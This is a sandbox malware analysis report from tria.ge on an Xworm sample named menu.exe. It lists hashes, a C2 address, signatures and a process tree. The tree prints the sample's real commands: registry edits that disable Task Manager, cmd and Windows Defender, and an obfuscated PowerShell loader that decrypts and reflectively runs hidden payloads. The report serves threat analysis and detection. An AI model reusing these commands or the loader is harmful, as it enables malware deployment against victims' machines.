Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
177s -
max time network
193s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
18/11/2024, 02:05
Static task
static1
Behavioral task
behavioral1
Sample
menu.exe
Resource
win7-20240903-en
General
-
Target
menu.exe
-
Size
309KB
-
MD5
b7a65ac9cc1f6ac490080b604dca0209
-
SHA1
40faa498a2e24a65b8ba74fd8123e63e2432f71f
-
SHA256
061282d0c5d8967e46c0b0739488fbefd996615a9059844274b1cb4df83b52bb
-
SHA512
fea5efae6766efd76d1b504ea516dd14eef955e84fec12a9035752366b7d36e078064b2088e04bee30ce267baa899a1b87f5a023316e59d4ecba7387a61943ed
-
SSDEEP
6144:QGXEB3uR4D7P05EkRTwEur5447h/PcHnUSFIT7JHoI0E7YPWs3kZy:QapW/PqbTw3FcHUSFU1v0E7v
Malware Config
Extracted
xworm
85.209.133.220:111
-
Install_directory
%Userprofile%
-
install_file
system.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/912-27-0x00000267F83F0000-0x00000267F8406000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 16 912 powershell.exe 20 912 powershell.exe 25 912 powershell.exe -
Blocks application from running via registry modification 3 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" reg.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "powershell.exe" reg.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 912 powershell.exe -
Disables Task Manager via registry modification
-
Disables cmd.exe use via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" reg.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation menu.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\system.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings menu.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe 912 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 912 powershell.exe Token: SeDebugPrivilege 912 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 912 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 3992 wrote to memory of 1664 3992 menu.exe 83 PID 3992 wrote to memory of 1664 3992 menu.exe 83 PID 3992 wrote to memory of 1004 3992 menu.exe 85 PID 3992 wrote to memory of 1004 3992 menu.exe 85 PID 3992 wrote to memory of 4816 3992 menu.exe 87 PID 3992 wrote to memory of 4816 3992 menu.exe 87 PID 1664 wrote to memory of 4972 1664 cmd.exe 88 PID 1664 wrote to memory of 4972 1664 cmd.exe 88 PID 4972 wrote to memory of 1356 4972 net.exe 89 PID 4972 wrote to memory of 1356 4972 net.exe 89 PID 1664 wrote to memory of 4312 1664 cmd.exe 90 PID 1664 wrote to memory of 4312 1664 cmd.exe 90 PID 1664 wrote to memory of 4020 1664 cmd.exe 91 PID 1664 wrote to memory of 4020 1664 cmd.exe 91 PID 1664 wrote to memory of 2344 1664 cmd.exe 92 PID 1664 wrote to memory of 2344 1664 cmd.exe 92 PID 1664 wrote to memory of 2940 1664 cmd.exe 93 PID 1664 wrote to memory of 2940 1664 cmd.exe 93 PID 1664 wrote to memory of 1448 1664 cmd.exe 94 PID 1664 wrote to memory of 1448 1664 cmd.exe 94 PID 1664 wrote to memory of 3828 1664 cmd.exe 95 PID 1664 wrote to memory of 3828 1664 cmd.exe 95 PID 1664 wrote to memory of 1912 1664 cmd.exe 96 PID 1664 wrote to memory of 1912 1664 cmd.exe 96 PID 1664 wrote to memory of 3612 1664 cmd.exe 97 PID 1664 wrote to memory of 3612 1664 cmd.exe 97 PID 1004 wrote to memory of 912 1004 cmd.exe 101 PID 1004 wrote to memory of 912 1004 cmd.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\menu.exe"C:\Users\Admin\AppData\Local\Temp\menu.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\load.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:1356
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f3⤵PID:4312
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d 1 /f3⤵
- Disables cmd.exe use via registry modification
PID:4020
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2344
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDrives" /t REG_DWORD /d 4 /f3⤵PID:2940
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer" /v "DisableMSI" /t REG_DWORD /d 1 /f3⤵PID:1448
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3828
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f3⤵
- Blocks application from running via registry modification
PID:1912
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "powershell.exe" /f3⤵
- Blocks application from running via registry modification
PID:3612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\loader.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IRcHV6wpyUlV7FCq3bjBVC6HnvFYqZVt3VMM1/rthAU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ot9DBajrhd5olnzo/saVIg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DyDjK=New-Object System.IO.MemoryStream(,$param_var); $nXYTA=New-Object System.IO.MemoryStream; $riGTr=New-Object System.IO.Compression.GZipStream($DyDjK, [IO.Compression.CompressionMode]::Decompress); $riGTr.CopyTo($nXYTA); $riGTr.Dispose(); $DyDjK.Dispose(); $nXYTA.Dispose(); $nXYTA.ToArray();}function execute_function($param_var,$param2_var){ $dwlZo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UVtXb=$dwlZo.EntryPoint; $UVtXb.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\loader.bat';$InQWi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\loader.bat').Split([Environment]::NewLine);foreach ($XQbNl in $InQWi) { if ($XQbNl.StartsWith(':: ')) { $WcJMs=$XQbNl.Substring(3); break; }}$payloads_var=[string[]]$WcJMs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:912
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ran.vbs"2⤵PID:4816
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5cf08811b97cdd3d57685a7841a40e2d4
SHA1faefa9b229e81eef5d200799c39b5db5511922d2
SHA2567f27ffda0644c500961f965c6f403f54c41c6df7fb685020cf98f7be6fd5082c
SHA512695e45bc85be611ca90e92ff5502a707e6ec298f31b6113be2537be78beda222d52751f090b0dda752e2880ac08c62c6d80f4fdd371b2721f1c728d9ebd1002a
-
Filesize
291KB
MD5d05f7937bc9eef5bf3042a8a2ecd2f08
SHA115230c5d5506e80ac6cecd06a21bea1a44aeef08
SHA256b981829c3b1026c432c08bc8a65bc1a848750596e01a065bcacef49c128f7226
SHA51242954c12e551ff742ab466b416f805d93632cafab1bd2c825b16dcb4f838d7914e61e84cf46744d081d0e6424a3afd335cd169cf8e9c0b6d83733f45eba71c95
-
Filesize
4KB
MD5be03bd7bd0315142da6482ee8075f97d
SHA144242df82433922b5dae792842d18da1eccac112
SHA256f245b406955a4a335f5eb76ef8e48958c55be9e7e667545e95602440c64ee9ae
SHA51255230398878d8cbca4b14a93b9e5cae00790f845140f28c9c82c622e7bc53eb4c9875de281eb3ba280478cbecbe56eb6a1720832e9afc6607daeafb83f83e7e9